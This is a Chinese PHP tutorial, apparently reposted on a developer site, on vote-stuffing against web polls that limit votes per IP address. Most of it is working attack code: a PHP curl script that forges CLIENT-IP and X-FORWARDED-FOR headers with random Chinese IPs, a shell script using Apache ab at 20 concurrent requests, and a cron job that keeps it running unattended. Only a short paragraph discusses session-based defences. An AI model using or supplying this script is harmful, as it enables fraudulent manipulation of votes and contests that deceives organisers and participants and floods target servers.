Heim >Backend-Entwicklung >PHP-Tutorial >关于投票系统刷票形式原理(突破ip限制刷票PHP版)

关于投票系统刷票形式原理(突破ip限制刷票PHP版)

WBOY
WBOYOriginal
2016-06-13 12:01:261130Durchsuche

关于投票系统刷票方式原理(突破ip限制刷票PHP版)

先说一点:其实不算是突破ip限制,因为事实上,这个限制是在服务器端的,客户端在牛逼,也突破不了..只是可以一直刷多次票罢了

一个朋友突然发了一个网站,让我帮她投投票..我这人一项比较好说话,就帮她投了.顺便分析了这个网站,发现这个网站的投票系统有ip限制,但是投票是一个ajax请求.那么办法就出来了.

很多投票PC网站都是依靠限制ip,来限制投票人数.那么我用curl伪造IP,那么就可以轻易制造多个IP进行投票.

下面贴上PHP代码:

由于对方是GET AJAX请求,我这里就贴上GET方法,POST方法请自行修改

<?php /** * @author 邹颢	[email&#160;protected] */$ip_long = array(	array(&#39;607649792&#39;, &#39;608174079&#39;), //36.56.0.0-36.63.255.255	array(&#39;1038614528&#39;, &#39;1039007743&#39;), //61.232.0.0-61.237.255.255	array(&#39;1783627776&#39;, &#39;1784676351&#39;), //106.80.0.0-106.95.255.255	array(&#39;2035023872&#39;, &#39;2035154943&#39;), //121.76.0.0-121.77.255.255	array(&#39;2078801920&#39;, &#39;2079064063&#39;), //123.232.0.0-123.235.255.255	array(&#39;-1950089216&#39;, &#39;-1948778497&#39;), //139.196.0.0-139.215.255.255	array(&#39;-1425539072&#39;, &#39;-1425014785&#39;), //171.8.0.0-171.15.255.255	array(&#39;-1236271104&#39;, &#39;-1235419137&#39;), //182.80.0.0-182.92.255.255	array(&#39;-770113536&#39;, &#39;-768606209&#39;), //210.25.0.0-210.47.255.255	array(&#39;-569376768&#39;, &#39;-564133889&#39;), //222.16.0.0-222.95.255.255);$rand_key = mt_rand(0, 9);$ip= long2ip(mt_rand($ip_long[$rand_key][0], $ip_long[$rand_key][1]));//随机生成国内某个ip$url=&#39;localhost/ip.php&#39;;//这里请填写投票的请求地址$ch = curl_init($url);$header = array( 	"CLIENT-IP:{$ip}", 	"X-FORWARDED-FOR:{$ip}", ); curl_setopt($ch,CURLOPT_HTTPHEADER,$header);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ; // 获取数据返回curl_exec($ch);curl_close($ch);



前部分是随机生成国内的某个ip,然后用curl模拟请求.

由于网站限制是一个ip限制1个小时投30个票,因此,我这里就是随机的.

如果网站是限制1个ip投1个,那么最好把ip修改为顺序生成国内ip,这样可以不重复.

然后我在开启,apache ab,每次并发20个投票..很快票就刷上去了.

那么面对这样的恶意刷票有什么解决办法呢?

我没有什么好的办法防御.但是我这样的curl实际上就是webservice访问,这样的访问是不带session或者cookie的,当然,curl也可以模拟带上cookie,然后在带上phpsessionid从而来带上session.

但是对于一个未知网站而言,并不知道他的处理方式.因此,如果判断是否存在session会有效抵挡一批刷票.但是在提示的时候切勿提示是缺少session这样的文字.最好在给session一个有效时期,这样的安全度会提高(但是如果刷票者知道这样的原理,并不意味能防御住他)

补充一点:很多代码上说能够获取访问者真实的IP地址,这个我没有遇过到正确的能够获取用户真实ip的方法.如果有的话,欢迎留言

如果有什么好的防御方案,希望留言.



有时候如果超时可能会导致脚本中断,最好在配合一个crond来每分钟都执行一下脚本

脚本代码为:

#!/bin/shpid=`ps -ef |grep localhost/vote.php |grep vote.php | awk '{print $2}'`;if [[ $pid == "" ]];then	echo "vote is start";	nohup /usr/bin/ab -n 100000 -c 20 http://localhost/vote.phpelse	echo "vote.php is running";fi

这个脚本就是每分钟判断这个进程存在不,存在的话,就不管,不存在的话,就启动这个进程..

另外可以不用使用nohup来后台执行

在开启crond每分钟跑起来

crontab -e

编辑crond任务

* * * * * /www/web/default/Controller/Script/vote.sh


前5个*号就是代表每个分钟都执行这个脚本..如果不详,请查阅cron资料

在开启cron

service crond start

大工告成,安心让他自动刷吧.你可以去忙别的事了


Windows系统请自行计划任务,我这里就不帖代码了

Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn